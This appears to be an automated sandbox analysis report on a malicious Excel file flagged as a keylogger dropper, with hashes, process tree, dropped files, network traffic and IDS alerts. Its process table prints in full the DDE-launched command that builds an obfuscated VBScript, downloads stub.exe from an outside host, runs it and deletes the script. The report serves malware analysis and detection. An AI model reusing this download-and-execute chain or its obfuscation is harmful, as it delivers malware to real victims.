File name: | malicious.xls |
Full analysis: | https://app.any.run/tasks/1f404c4f-2e01-4e11-babd-77b904508a4e |
Verdict: | Malicious activity |
Threats: | A keylogger is a type of spyware that infects a system and has the ability to record every keystroke made on the device. This lets attackers collect personal information of victims, which may include their online banking credentials, as well as personal conversations. The most widespread vector of attack leading to a keylogger infection begins with a phishing email or link. Keylogging is also often present in remote access trojans as part of an extended set of malicious tools. |
Analysis date: | January 18, 2019, 10:42:54 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.spreadsheetml.sheet |
File info: | Microsoft Excel 2007+ |
MD5: | 998C37003B6FE1B3338528CA47068D38 |
SHA1: | B8F772F71046049E13BC385F1D13A6CC5BD9AC17 |
SHA256: | 66323CD37F75614124A696CB0CC10CFC755E279FC923DB1BA7F5825B02AA78FF |
SSDEEP: | 384:tHaFEIodeBPJ2cwPr6wKisY3nutbOm2eIa2u:qEIoQBP+P/KisNtbOmYab |
.xlsm | | | Excel Microsoft Office Open XML Format document (with Macro) (50.8) |
---|---|---|
.xlsx | | | Excel Microsoft Office Open XML Format document (30) |
.zip | | | Open Packaging Conventions container (15.4) |
.zip | | | ZIP compressed archive (3.5) |
AppVersion: | 12 |
---|---|
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
TitlesOfParts: |
|
HeadingPairs: |
|
ScaleCrop: | No |
DocSecurity: | None |
Application: | Microsoft Excel |
ModifyDate: | 2019:01:17 09:13:03Z |
CreateDate: | 2019:01:17 09:07:05Z |
LastModifiedBy: | admin |
Creator: | admin |
---|
ZipFileName: | [Content_Types].xml |
---|---|
ZipUncompressedSize: | 1359 |
ZipCompressedSize: | 389 |
ZipCRC: | 0x66e51af1 |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0006 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2796 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
3192 | CMd /c cd %TEMP% & @ECHO P0i= "http://www.neeba.in/stub.exe">>Q8m.VBS &@ECHO Y9x = P3a("ymtOfyf")>>Q8m.VBS &@ECHO Set U6m = CreateObject(P3a("ntynmSOynmiuuq"))>>Q8m.VBS &@ECHO U6m.Open P3a("hfu"), P0i, False>>Q8m.VBS &@ECHO U6m.send ("")>>Q8m.VBS &@ECHO Set J5p = CreateObject(P3a("bepecOtusfbn"))>>Q8m.VBS &@ECHO J5p.Open>>Q8m.VBS &@ECHO J5p.Type = 1 >>Q8m.VBS &@eCHo J5p.Write U6m.ResponseBody>>Q8m.VBS &@ECHO J5p.Position = 0 >>Q8m.VBS &@ECHO J5p.SaveToFile Y9x, 2 >>Q8m.VBS &@ECHO J5p.Close>>Q8m.VBS &@ECHO function P3a(T7t) >> Q8m.VBS &@ECHO For W9p = 1 To Len(T7t) >>Q8m.VBS &@ECHO K5w = Mid(T7t, W9p, 1) >>Q8m.VBS &@ECHO K5w = Chr(Asc(K5w)- 33) >>Q8m.VBS &@ECHO R8t = R8t + K5w >> Q8m.VBS &@ECHO Next >>Q8m.VBS &@ECHO P3a = R8t >>Q8m.VBS &@ECHO End Function >>Q8m.VBS & Q8m.VBS &dEl Q8m.VBS & tIMeOUT 13 & XLS.EXE | C:\Windows\system32\CMd.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2924 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Q8m.VBS" | C:\Windows\System32\WScript.exe | CMd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
3088 | tIMeOUT 13 | C:\Windows\system32\timeout.exe | — | CMd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: timeout - pauses command processing Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2676 | XLS.EXE | C:\Users\admin\AppData\Local\Temp\XLS.EXE | CMd.exe | |
User: admin Integrity Level: MEDIUM Version: 1.2.0.1 | ||||
3948 | "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\WININET.dll",DispatchAPICall 1 | C:\Windows\system32\rundll32.exe | — | XLS.EXE |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Windows host process (Rundll32) Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3168 | C:\Windows\system32\cmd.exe /k systeminfo | C:\Windows\system32\cmd.exe | — | XLS.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3704 | systeminfo | C:\Windows\system32\systeminfo.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Displays system information Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2796 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR8FE2.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2676 | XLS.EXE | C:\Users\admin\AppData\Local\Temp\aut5833.tmp | — | |
MD5:— | SHA256:— | |||
2676 | XLS.EXE | C:\Users\admin\AppData\Local\Temp\uwvmqam | — | |
MD5:— | SHA256:— | |||
2676 | XLS.EXE | C:\Users\admin\AppData\Local\Temp\aut5853.tmp | — | |
MD5:— | SHA256:— | |||
2796 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~$malicious.xls | — | |
MD5:— | SHA256:— | |||
2796 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF64EF4F56B1E07BB6.TMP | — | |
MD5:— | SHA256:— | |||
3192 | CMd.exe | C:\Users\admin\AppData\Local\Temp\Q8m.VBS | text | |
MD5:F12DF8549A350E3A30F5946D1E669287 | SHA256:637BF27280437EE85286F0175A8D97C4796CC3777B5A6DAB5EAB502DE820931C | |||
2676 | XLS.EXE | C:\Users\admin\AppData\Roaming\log\AutoUpdate.exe | executable | |
MD5:42AD20DF1DDD74B47AA45ED48130AFFF | SHA256:0E6F5DC3F0AA4D50083C522636AB09CACCEB01DD813C13CC1FE395A31EBB613A | |||
2924 | WScript.exe | C:\Users\admin\AppData\Local\Temp\XLS.EXE | executable | |
MD5:A1EB94D1CA0704AF51C128F978273E7C | SHA256:1CC476A2197B4C20510A12194D238954DF3FBE27A28EA51EB0668DD7C7FD6009 | |||
2924 | WScript.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\stub[1].exe | executable | |
MD5:A1EB94D1CA0704AF51C128F978273E7C | SHA256:1CC476A2197B4C20510A12194D238954DF3FBE27A28EA51EB0668DD7C7FD6009 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2924 | WScript.exe | GET | 200 | 176.9.40.89:80 | http://www.neeba.in/stub.exe | DE | executable | 805 Kb | suspicious |
2676 | XLS.EXE | GET | 200 | 147.75.40.2:80 | http://icanhazip.com/ | US | text | 14 b | shared |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2924 | WScript.exe | 176.9.40.89:80 | www.neeba.in | Hetzner Online GmbH | DE | suspicious |
2676 | XLS.EXE | 147.75.40.2:80 | icanhazip.com | Packet Host, Inc. | US | suspicious |
Domain | IP | Reputation |
---|---|---|
www.neeba.in |
| suspicious |
icanhazip.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
2924 | WScript.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2676 | XLS.EXE | Potential Corporate Privacy Violation | ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile |
2676 | XLS.EXE | A Network Trojan was detected | SUSPICIOUS [PTsecurity] Malware Style IP Check |
2676 | XLS.EXE | Attempted Information Leak | ET POLICY IP Check Domain (icanhazip. com in HTTP Host) |